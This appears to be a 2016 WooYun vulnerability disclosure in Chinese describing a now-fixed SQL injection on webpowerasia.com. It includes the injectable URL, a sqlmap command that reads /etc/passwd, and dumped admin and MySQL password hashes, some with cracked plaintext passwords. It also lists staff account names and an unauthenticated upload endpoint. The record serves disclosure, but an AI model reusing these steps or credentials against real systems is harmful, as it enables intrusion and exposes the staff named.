当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0192360

漏洞标题:webpower官网sql注入漏洞,已入后台,数据库root权限

相关厂商:webpower

漏洞作者: whoamiecho

提交时间:2016-04-05 11:58

修复时间:2016-04-05 16:23

公开时间:2016-04-05 16:23

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经修复

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-04-05: 细节已通知厂商并且等待厂商处理中
2016-04-05: 厂商已经确认,细节仅向厂商公开
2016-04-05: 厂商已经修复漏洞并主动公开,细节向公众公开

简要描述:

webpower官网sql注入漏洞,已入后台,数据库root权限

详细说明:

求个邀请码:
注入点:
http://www.webpowerasia.com/m/con.php?id=11
通过sqlmap测试:

QQ截图20160404124627.png


数据库挺多的,

available databases [19]:
[*] information_schema
[*] k11_birthday
[*] k11_optin
[*] ktest
[*] mysql
[*] phpmyadmin
[*] site_xbox
[*] task
[*] ued_wiki
[*] webpower_website
[*] wechat_site
[*] wp-e-sight
[*] wp-e-sight-en
[*] wp_e-home
[*] wp_faq
[*] wp_task
[*] wp_tl-group
[*] wp_webpowerasia
[*] wp_website


先来拿下网站吧:
尝试寻找网站数据库并获取后台用户名和密码:

Database: wp_webpowerasia
[16 tables]
+-------------------+
| cases_category |
| customer_category |
| manage_about |
| manage_admin |
| manage_admin_log |
| manage_apply |
| manage_cases |
| manage_config |
| manage_customer |
| manage_event |
| manage_links |
| manage_mt |
| manage_news |
| manage_post |
| post_category |
| tag_category |
+-------------------+
Database: wp_webpowerasia
Table: manage_admin
[4 columns]
+--------------+--------------+
| Column | Type |
+--------------+--------------+
| content | mediumtext |
| id | int(11) |
| username | varchar(200) |
| userpassword | varchar(200) |
+--------------+--------------+
Database: wp_webpowerasia
Table: manage_admin
[1 entry]
+----------+----------------------------------+
| username | userpassword |
+----------+----------------------------------+
| admin | 6966fe537468bb6a170b3c40ba22538d |
+----------+----------------------------------+


解密结果为:webp0wer
,获取后台:
http://www.webpowerasia.com/manage/index.php
登陆试试:

QQ截图20160404130741.jpg


网站有两种上传类型,一个是编辑器:CKEditor 3.2.1 (revision 5372)
可修改上传文件名;一个是自己写的
这里存在任意文件上传:

QQ截图20160404131452.jpg

QQ截图20160404130710.jpg


http://www.webpowerasia.com//uploadfile/201604/20160404010622.txt

QQ截图20160404130647.jpg


上传点可未授权访问:
http://www.webpowerasia.com//manage/post/up_pic.php
透过后台得到网站绝对路径:
/var/www/html/webpowerasia
那我们来通过注入获取文件:
sqlmap.py -u "http://www.webpowerasia.com/m/con.php?id=29" --file-read "etc/passwd"

QQ截图20160404132000.jpg


root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
rpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
saslauth:x:499:76:"Saslauthd user":/var/empty/saslauth:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
abrt:x:173:173::/etc/abrt:/sbin/nologin
qpidd:x:498:499:Owner of Qpidd Daemons:/var/lib/qpidd:/sbin/nologin
avahi:x:70:70:Avahi mDNS/DNS-SD Stack:/var/run/avahi-daemon:/sbin/nologin
tomcat:x:91:91:Apache Tomcat:/usr/share/tomcat6:/sbin/nologin
tcpdump:x:72:72::/:/sbin/nologin
webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
oprofile:x:16:16:Special user account to be used by OProfile:/home/oprofile:/sbin/nologin
alonso.chen:x:501:501::/home/alonso.chen:/bin/bash
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash
leo.chen:x:502:502::/home/leo.chen:/bin/bash
rocky.zhang:x:503:503::/home/rocky.zhang:/bin/bash
postmaster:x:504:504::/home/postmaster:/sbin/nologin
dovecot:x:97:97:Dovecot IMAP server:/usr/libexec/dovecot:/sbin/nologin
dovenull:x:497:496:Dovecot's unauthorized user:/usr/libexec/dovecot:/sbin/nologin
koen:x:505:505::/home/koen:/bin/bash
kuku.li:x:507:507::/home/kuku.li:/bin/bash
bob.liu:x:508:508::/home/bob.liu:/bin/bash
michael.han:x:509:510::/home/michael.han:/bin/bash
mkt_upload:x:512:513::/var/www/html/webpowerwebsite/uploadfile/markting:/bin/bash
pluto.chan:x:513:514::/home/pluto.chan:/bin/bash
rain.zhao:x:514:515::/home/rain.zhao:/bin/bash
zabbix:x:496:495:Zabbix Monitoring System:/var/lib/zabbix:/sbin/nologin


QQ截图20160404133043.jpg


还可以获取数据库用户名和密码哦,这里再贴一下其他数据吧:

database management system users password hashes:
[*] alonso.chen [1]:
password hash: *80F2C54DD0E8548D01BCA1D75AB6E4A5FD1AA7BF
[*] root [2]:
password hash: *51BBF7BD5C01E0212ED1EC596FA7CCE962AA1B33
password hash: NULL



Database: wp_website
[16 tables]
+-------------------+
| cases_category |
| customer_category |
| manage_about |
| manage_admin |
| manage_admin_log |
| manage_apply |
| manage_cases |
| manage_config |
| manage_customer |
| manage_event |
| manage_links |
| manage_mt |
| manage_news |
| manage_post |
| post_category |
| tag_category |
+-------------------+
Table: manage_admin
[4 columns]
+--------------+--------------+
| Column | Type |
+--------------+--------------+
| content | mediumtext |
| id | int(11) |
| username | varchar(200) |
| userpassword | varchar(200) |
+--------------+--------------+
Table: manage_admin
[1 entry]
+---------------+----------------------------------+
| username | userpassword |
+---------------+----------------------------------+
| webpowerchina | 1309112725a40e38aa14e35e3a50a53c |
+---------------+----------------------------------+

Database: wp_faq
Table: manage_admin
[9 entries]
+-------------+----------------------------------+
| username | userpassword |
+-------------+----------------------------------+
| admin | 6f292abc57aa3dde9ef9886c590d26f3 | Webpower1
| wp_leo | 6966fe537468bb6a170b3c40ba22538d |
| nicole.shen | b56e0b4ea4962283bee762525c2d490f |
| van.fan | 6966fe537468bb6a170b3c40ba22538d |
| monica.sun | 6966fe537468bb6a170b3c40ba22538d |
| joyce.huang | 76e2e42643666620948c29cc8ca48f78 |
| allen.jing | 4f066b79b7ffe87cb953536d470b07e0 |
| cathy | 25d55ad283aa400af464c76d713c07ad |
| <blank> | d41d8cd98f00b204e9800998ecf8427e |

漏洞证明:

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
rpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
saslauth:x:499:76:"Saslauthd user":/var/empty/saslauth:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
abrt:x:173:173::/etc/abrt:/sbin/nologin
qpidd:x:498:499:Owner of Qpidd Daemons:/var/lib/qpidd:/sbin/nologin
avahi:x:70:70:Avahi mDNS/DNS-SD Stack:/var/run/avahi-daemon:/sbin/nologin
tomcat:x:91:91:Apache Tomcat:/usr/share/tomcat6:/sbin/nologin
tcpdump:x:72:72::/:/sbin/nologin
webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
oprofile:x:16:16:Special user account to be used by OProfile:/home/oprofile:/sbin/nologin
alonso.chen:x:501:501::/home/alonso.chen:/bin/bash
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash
leo.chen:x:502:502::/home/leo.chen:/bin/bash
rocky.zhang:x:503:503::/home/rocky.zhang:/bin/bash
postmaster:x:504:504::/home/postmaster:/sbin/nologin
dovecot:x:97:97:Dovecot IMAP server:/usr/libexec/dovecot:/sbin/nologin
dovenull:x:497:496:Dovecot's unauthorized user:/usr/libexec/dovecot:/sbin/nologin
koen:x:505:505::/home/koen:/bin/bash
kuku.li:x:507:507::/home/kuku.li:/bin/bash
bob.liu:x:508:508::/home/bob.liu:/bin/bash
michael.han:x:509:510::/home/michael.han:/bin/bash
mkt_upload:x:512:513::/var/www/html/webpowerwebsite/uploadfile/markting:/bin/bash
pluto.chan:x:513:514::/home/pluto.chan:/bin/bash
rain.zhao:x:514:515::/home/rain.zhao:/bin/bash
zabbix:x:496:495:Zabbix Monitoring System:/var/lib/zabbix:/sbin/nologin

修复方案:

过滤

版权声明:转载请注明来源 whoamiecho@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:5

确认时间:2016-04-05 12:52

厂商回复:

正在修复中

最新状态:

2016-04-05:已修复


漏洞评价:

评价

  1. 2016-04-06 14:14 | Dotaer ( 路人 | Rank:16 漏洞数:3 | 多学习,多挖洞!)

    这么熟练,还要邀请码?又是哪位大牛的小号啊?

  2. 2016-04-07 19:47 | Soulmk ( 实习白帽子 | Rank:42 漏洞数:11 | 低调学习求发展~)

    之前搁我那把后台限制登陆了,到这又没限制了。。。。这洞还补吗。。。

  3. 2016-04-08 16:29 | whoamiecho ( 路人 | Rank:2 漏洞数:1 | xxx)

    rp,哈哈

  4. 2016-04-08 16:29 | whoamiecho ( 路人 | Rank:2 漏洞数:1 | xxx)

    @Soulmk rp